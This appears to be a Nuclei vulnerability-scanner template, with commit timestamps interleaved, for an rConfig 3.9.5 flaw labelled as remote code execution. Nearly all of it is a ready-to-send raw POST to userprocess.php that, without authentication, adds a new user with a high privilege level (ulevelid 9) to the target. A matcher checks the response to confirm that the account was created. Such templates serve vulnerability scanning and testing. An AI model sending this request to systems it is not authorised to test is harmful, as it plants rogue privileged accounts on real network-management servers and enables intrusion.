2020-10-15 17:26:11 +00:00
id : rconfig-rce
info :
name : rConfig 3.9.5 - Remote Code Execution
author : dwisiswant0
severity : high
2021-02-12 05:53:01 +00:00
tags : rconfig,rce
2021-10-27 11:06:15 +00:00
description : A vulnerability in rConfig allows remote attackers to execute arbitrary code on the remote installation by accessing the 'userprocess.php' endpoint.
2021-08-19 13:15:35 +00:00
reference :
2021-08-19 14:44:46 +00:00
- https://www.rconfig.com/downloads/rconfig-3.9.5.zip
- https://www.exploit-db.com/exploits/48878
2020-10-15 17:26:11 +00:00
requests :
- raw :
- |
POST /lib/crud/userprocess.php HTTP/1.1
Host : {{Hostname}}
Accept : */*
Content-Type : multipart/form-data; boundary=01b28e152ee044338224bf647275f8eb
2021-09-08 12:17:19 +00:00
Cookie : PHPSESSID={{randstr}}
2020-10-15 17:26:11 +00:00
--01b28e152ee044338224bf647275f8eb
Content-Disposition : form-data; name="username"
2021-09-08 12:17:19 +00:00
{{randstr}}
2020-10-15 17:26:11 +00:00
--01b28e152ee044338224bf647275f8eb
Content-Disposition : form-data; name="passconf"
Testing1@
--01b28e152ee044338224bf647275f8eb
Content-Disposition : form-data; name="password"
Testing1@
--01b28e152ee044338224bf647275f8eb
Content-Disposition : form-data; name="email"
2021-10-06 23:53:20 +00:00
test@{{randstr}}.tld
2020-10-15 17:26:11 +00:00
--01b28e152ee044338224bf647275f8eb
Content-Disposition : form-data; name="editid"
--01b28e152ee044338224bf647275f8eb
Content-Disposition : form-data; name="add"
add
--01b28e152ee044338224bf647275f8eb
Content-Disposition : form-data; name="ulevelid"
9
--01b28e152ee044338224bf647275f8eb--
matchers-condition : and
matchers :
- type : word
words :
2021-09-08 12:17:19 +00:00
- "User {{randstr}} successfully added to Database"
2020-10-15 17:26:11 +00:00
part : body
- type : status
status :
- 302
